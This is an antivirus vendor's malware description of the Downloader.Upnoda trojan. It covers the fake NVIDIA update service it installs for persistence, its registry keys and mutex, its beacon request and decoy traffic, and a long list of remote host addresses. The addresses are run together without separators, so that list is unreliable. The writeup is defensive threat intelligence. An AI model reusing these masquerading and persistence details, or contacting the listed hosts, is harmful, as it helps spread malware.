Home / malware Downloader.Upnoda
First posted on 13 November 2014.
Source: SymantecAliases :
There are no other names known for Downloader.Upnoda.
Explanation :
When the Trojan is executed, it creates the following file:
C:\Program Files\NVIDIA Corporation\Updates\NvdUpd.exe
The Trojan creates the following registry entries:
HKEY_USERS\.DEFAULT\Software\NVIDIA Corporation\Global\nvUpdSrv\"value" = "14141103"HKEY_USERS\.DEFAULT\Software\NVIDIA Corporation\Global\nvUpdSrv\"GUID" ="5181c0f2-22fc-4d3e-ab9d-f12df226fc52"
The Trojan modifies the following registry entries so that it runs every time Windows starts:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NvUpdSrv\"Type" = dword:00000010HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NvUpdSrv\"Start" = dword:00000002HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NvUpdSrv\"ObjectName" = "LocalSystem"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NvUpdSrv\"ImagePath" = expand:"C:\ProgramFiles\NVIDIA Corporation\Updates\NvdUpd.exe"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NvUpdSrv\"ErrorControl" = dword:00000000HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NvUpdSrv\"DisplayName" = "NVIDIA UpdateServer"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NvUpdSrv\"Description" = "NVIDIA SettingsUpdate Manager service, used to check new updates from NVIDIA server"
The Trojan creates the following service:
NvUpdSrv
The Trojan may create the following mutexes to mark its presence on the compromised computer:
Global\\MD7H82HHF7EH2D73Nod32_vsegda_na_shag_pozadi
The Trojan may create a file containing the word "OK" if the following command line is specified:
/test [FILE NAME]
The Trojan may contact a remote host (see list below).
The Trojan sends the following request to a remote host:
GET /stat?uid=100&downlink=1111&uplink=1111&id=0007EADB&statpass=bpass&version=14141025&features=30&guid=80c040ab-5524-4a11-8f10-3eda1378bf70&comment=14141025&p=0&s=HTTP/1.0
The Trojan sends a request to its remote host to perform a GET operation on a remote host with the following command:
>LMrMGET /robots.txt HTTP/1.1
Host: www.google.com
Accept: */*
Note: The above command is decrypted. The command will normally appear in an encrypted format.
The Trojan receives the following data from the remote host:
the robots.txt
Note: The Trojan allows its remote host to send data back to hide malicious traffic.
The Trojan downloads and runs encrypted files.
Remote host list:
184.106.82.27:40259213.229.78.145:26084206.220.43.92:41780193.111.2.42:64167195.12.48.190:6130750.115.127.84:4910550.17.185.81:32353193.203.196.144:20480149.13.20.158:32136205.186.137.149:2309937.34.50.225:3391846.105.169.107:62059188.252.0.237:3309769.164.223.222:43118195.175.227.173:19592223.165.30.17:369915.34.183.119:31973204.10.38.236:28654212.58.15.2:54275217.28.192.36:37228198.7.58.68:23480213.192.92.3:53109212.58.4.190:19413213.239.227.1:29071209.17.119.203:34373107.6.137.234:15396217.117.155.156:30111212.53.89.138:31174146.0.7.65:2190346.105.8.10:6110781.27.85.81:21999209.124.64.106:31571204.14.213.177:1302363.251.156.211:242915.45.73.50:5151587.107.133.83:342755.77.45.71:58914104.131.39.69:51982217.146.84.52:1282537.203.143.244:48775210.168.30.246:2396231.192.211.42:3000731.192.112.72:3535237.58.72.235:49719178.60.205.159:5163354.241.28.66:2107431.192.211.203:32872203.135.192.31:2590546.45.163.130:6009846.105.183.122:60541217.148.186.239:35367129.82.103.78:36034188.165.186.239:1031580.252.188.228:3070866.155.9.238:2687877.78.104.96:1765378.46.54.252:21580202.217.72.1:19919194.27.180.16:1023861.175.227.159:2724731.172.248.42:36427189.89.125.65:18703200.59.162.167:2583346.165.233.149:35173207.19.62.122:3240637.59.34.40:292965.39.119.213:4266180.94.26.250:1928546.105.127.116:48166217.12.219.16:49976174.143.49.35:3748570.38.101.66:11410178.151.195.163:44937108.163.203.138:48741107.170.145.233:12898173.45.248.153:18397194.99.117.15:39361213.171.195.48:13664159.253.4.167:1373746.183.145.233:3057779.133.192.206:4102323.253.148.126:58046144.212.130.17:11263146.255.96.17:16107212.227.97.247:2251246.38.161.165:18625212.175.86.17:42737178.79.146.212:49878178.60.205.211:5466372.13.32.43:29755217.148.186.250:16193204.74.99.100:30124121.52.223.11:38107188.132.223.18:22740212.91.140.51:16549178.16.25.80:47298109.104.94.2:11754209.198.1.10:49891212.83.144.4:33816202.32.201.67:30989216.99.153.26:4964923.95.80.46:25127Last update 13 November 2014